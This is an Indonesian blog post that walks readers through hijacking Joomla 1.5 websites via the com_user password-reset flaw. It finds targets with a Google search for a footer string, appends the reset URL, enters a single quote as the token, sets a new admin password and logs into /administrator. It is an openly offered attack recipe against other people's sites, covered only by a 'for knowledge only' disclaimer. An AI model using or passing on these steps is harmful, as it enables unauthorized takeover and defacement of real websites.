Hack Joomla 1.5.x dengan com_user

Posted by Unknown 12 Mei 2010 0 comments

Joomla merupakan salah satu content management system (CMS) yang cukup populer. Namun, Joomla terbaru, versi 1.5, memiliki celah keamanan yang cukup fatal. Polanya sama dengan SQL Injection yang relatif kuno. SQL Injection juga pernah dipake xnuxer untuk membobol situs Komisi Pemilihan umum (KPU) beberapa tahun lampau.

Berikut ini cara-cara membobol situs berbasis Joomla 1.5.
1. Buka alamat target yang menggunakan Joomla 1.5. Anda bisa menemukan di Google dengan mengetikkan “by Joomla 1.5? di kolom pencrian. Sebab, secara default, kalimat ini ada dalam setiap footer situs berbasis Joomla 1.5.
2. Tambahkan baris di bawah ini setelah alamat target.
index.php?option=com_user&view=reset&layout=confirm
Menjadi:
target.com/index.php?option=com_user&view=reset&layout=confirm
2. Tuliskan pada kolom “token” karakter ‘ dan klik OK.
3. Isi password baru untuk admin.
4. Buka halaman target.com/administrator/.
5. Login admin dengan password baru.
6. Lakukan yang Anda suka secara bertanggung jawab.
Cara ini terjadi karena kesalahan coding pada file /components/com_user/models/reset.php dan /components/com_user/models/controller.php.
Posting ini hanya untuk pengetahuan. Segala bentuk penyalahgunaaan adalah tanggung jawab masing-masing orang.
Forgot username : target.com/index.php?option=com_user&view=remind
Forgot password : target.com/index.php?option=com_user&view=reset
register : target.com/index.php?option=com_user&view=register
Comments
0 Comments

0 comments:

Posting Komentar

Jangan Lupa Bermurah Hati Memberikan Sepatah Dua Kata di Komentar Ya !!!

Blog Archive

Label

Adsense (4) ANeH Euy (4497) AntiVirus (33) BerBloG RiA (213) BerDownload Ria (233) Berita (4584) Bola (213) Cerita (2007) Cybercrime (27) Entertainment (1630) Fashion (303) Fenomenal (1254) Film (470) Forum (11) Gadget (363) Gambar (3461) Games (167) Hot Celebs (355) Internet (504) Justin Bieber (61) Kesehatan (941) Kriminal (427) Lucu (1042) Misterius (1055) Musik (487) Ngegosip Nih (1232) Olahragara Yuk (911) Otomotif Nih (409) Sains (853) Sejarah (921) Seksologi (145) Serba-Serbi (4392) Teknologi (1165) Tentang Admin (7) Tips (1481) TV Online (2) Unik (632) Video (1457) Wisata (348) Zodiak (31)